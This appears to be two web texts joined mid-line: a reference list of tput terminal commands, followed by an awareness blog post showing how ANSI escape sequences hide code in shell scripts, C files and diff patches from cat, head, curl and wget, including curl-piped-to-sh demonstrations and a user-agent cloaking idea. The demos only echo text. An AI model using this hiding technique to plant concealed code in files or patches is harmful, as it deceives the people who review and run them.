Here is some more detail on the awesome tput command suggested in Ignacio's answer.
# Set the background colour using ANSI escape tput setab [1-7] # Set the foreground colour using ANSI escape tput setaf [1-7]
Colours are as follows:
Num Colour #define RGB 0 black COLOR_BLACK 0,0,0 1 red COLOR_RED max,0,0 2 green COLOR_GREEN 0,max,0 3 yellow COLOR_YELLOW max,max,0 4 blue COLOR_BLUE 0,0,max 5 magenta COLOR_MAGENTA max,0,max 6 cyan COLOR_CYAN 0,max,max 7 white COLOR_WHITE max,max,max
There are also non-ANSI versions of the colour setting functions (setb
instead of setab
, and setf
instead of setaf
) which use different numbers, not given here.
tput bold # Select bold mode tput dim # Select dim (half-bright) mode tput smul # Enable underline mode tput rmul # Disable underline mode tput rev # Turn on reverse video mode tput smso # Enter standout (bold) mode tput rmso # Exit standout mode tput sgr 0 # Reset all attributes
tput cup Y X # Move cursor to screen postion X,Y (top left is 0,0) tput cuf N # Move N characters forward (right) tput cub N # Move N characters back (left) tput cuu N # Move N lines up tput ll # Move to last line, first column (if no cup) tput sc # Save the cursor position tput rc # Restore the cursor position tput lines # Output the number of lines of the terminal tput cols # Output the number of columns of the terminal
tput ech N # Erase N characters tput clear # Clear screen and move the cursor to 0,0 tput el 1 # Clear to beginning of line tput el # Clear to end of line tput ed # Clear to end of screen tput ich N # Insert N characters (moves rest of line forward!) tput il N # Insert N lines
tput bel # play a bell
With compiz wobbly windows, the bel
command makes the terminal wobble for a second to draw the user's attention.
echo „$(tput setaf 1)Red text $(tput setab 7)and white background$(tput sgr 0)”
Looks like this on my Ubuntu terminal:
Use command sgr 0
to reset the colour at the end.
tput
accepts scripts containing one command per line, which are executed in order before tput exits.
Avoid temporary files by echoing a multiline string and piping it:
echo -e "setf 7\nsetb 1" | tput -S # set fg white and bg red
man 1 tput
man 5 terminfo
for the complete list of commands and more details on these options. (The corresponding tput command is listed in the Cap-name column of the huge table that starts at line 81.)So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?"
This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.
How it technically works:
A terminal escape sequence is a special sequence of characters that is printed (like any other text).
If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.
While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh $ chmod +x backdoor.sh $ cat backdoor.sh #!/bin/bash echo doing something very nice! $ ./backdoor.sh doing something evil!
As you can see, our beloved cat
cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence \033[XA
(being X
the number of times) performed some action. And this action moves the cursor up X
times, overwriting what is above it X
lines. But this doesn't affect only 'cat', it affects everything that
interprets escape sequences.
$ head backdoor.sh #!/bin/bash echo doing something very nice! $ tail backdoor.sh #!/bin/bash echo doing something very nice! $ more backdoor.sh #!/bin/bash echo doing something very nice!
It's not over yet!
$ curl 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! $ wget -qO - 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice!
But if we pipe it into a shell…
$ curl -s 127.0.0.1/backdoor.sh|sh doing something evil! $ wget -qO - 127.0.0.1/backdoor.sh|sh doing something evil!
You might be thinking „If I opened that in my browser, I would detect it being malicious!”
Well, think again…
One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then.
I wouldn't even be surprised if most of those install scripts that make use of these pipe into sh
bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files…
It's no secret, most of us rely on cat
to view files. I guess this is one black kitty, giving you bad luck.
Here's another example with a .c
file
$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do much... */\n\tprintf("doing something very nice\\n");\n\treturn 0;\n}\n' > nice.c $ cat nice.c #include <stdio.h> int main() { /* This simple program doesnt do much... */ printf("doing something very nice\n"); return 0; }
$ gcc nice.c $ ./a.out doing something evil doing something very nice
diff
also interprets escape sequences and so do the resulting patches
Going back to the first example, imagine I have a backdoored.sh
that is backdoored, and a legit.sh that does what it's output tells us.
$ cat backdoor.sh #evil file #!/bin/bash echo doing something very nice! $ cat legit.sh #actually echoes doing something very nice! #!/bin/bash echo doing something very nice! $ diff -Naur backdoor.sh legit.sh --- backdoor.sh 2015-09-17 16:25:42.985349535 +0100 +++ legit.sh 2015-09-17 16:26:14.950158635 +0100 @@ -1,4 +1,2 @@ #!/bin/bash -echo doing something very nice! +echo doing something very nice! $ diff -Naur backdoor.sh legit.sh > file.patch $ patch legit.sh -R file.patch $ chmod +x legit.sh $ ./legit.sh doing something evil!
less
doesn't interpret escape sequences unless the -r
switch is used, so stop aliasing it to less -r
just because there's no colored output.
s/party/hack like it's 1999